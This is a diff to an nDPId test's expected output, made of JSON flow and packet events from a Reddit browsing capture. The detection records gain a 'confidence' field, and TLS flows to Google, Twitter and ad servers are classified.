{"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00989{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688611,"flow_last_seen":1605291688611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688611,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605291688611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688611,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z44AAAAAoAL9IIe6AAACBAWgBAIICvY2BR4AAAAAAQMDBw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3908,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688654,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNBoNFCkHQgeCALYqAcsBIEmLB5kd7IUo3\/YpAbubOJS20cTxd2ePoBJXgMFkAAACBAV4AQMDAwQCCArC10K+9jYFHg=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3910,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688654,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z4+UttHFgBAB+0VLAAABAQgK9jYFScLXQr4="}
-00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00981{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688712,"flow_last_seen":1605291688712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688712,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605291688712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688712,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQQAAAAAoAL9IGnKAAACBAWgBAIICoWLJ5EAAAAAAQMDBw=="}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688749,"flow_last_seen":1605291688749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688749,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605291688749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688749,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7IAAAAAoAL9ICgwAAACBAWgBAIICm3\/yPIAAAAAAQMDBw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4156,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688754,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAYqAcsBIEmLB5kd7IUo3\/YpAbvVxjGyAqhUIR0FoBJXgNU8AAACBAV4AQMDAwQCCArC10MXhYsnkQ=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688754,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQUxsgKpgBAB+1kkAAABAQgKhYsnu8LXQxc="}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbvfwoEYYXPjQDuzoBJXgOVIAAACBAV4AQMDAwQCCArC10M\/bf\/I8g=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688786,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7OBGGF0gBAB+2k0AAABAQgKbf\/JGMLXQz8="}
-00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688830,"flow_last_seen":1605291688830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688830,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605291688830,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688830,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5AAAAAAoAL9IFwjAAACBAWgBAIICu7gTZEAAAAAAQMDBw=="}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688831,"flow_last_seen":1605291688831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688831,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -262,55 +262,55 @@
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/oAAAAAoAL9IC3PAAACBAWgBAIICjfz93gAAAAAAQMDBw=="}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdYAAAAAoAL9IPghAAACBAWgBAIICjfz93gAAAAAAQMDBw=="}
-00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4xvp17E2f1af7oBJXgOZHAAACBAV4AQMDAwQCCArC10OnN\/P3eA=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4yD8lZERbpSHXoBJXgPP1AAACBAV4AQMDAwQCCArC10OmN\/P3eA=="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4820,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/v6dexOgBAB+2orAAABAQgKN\/P3psLXQ6c="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4821,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdc\/JWRFgBAB+3fZAAABAQgKN\/P3psLXQ6Y="}
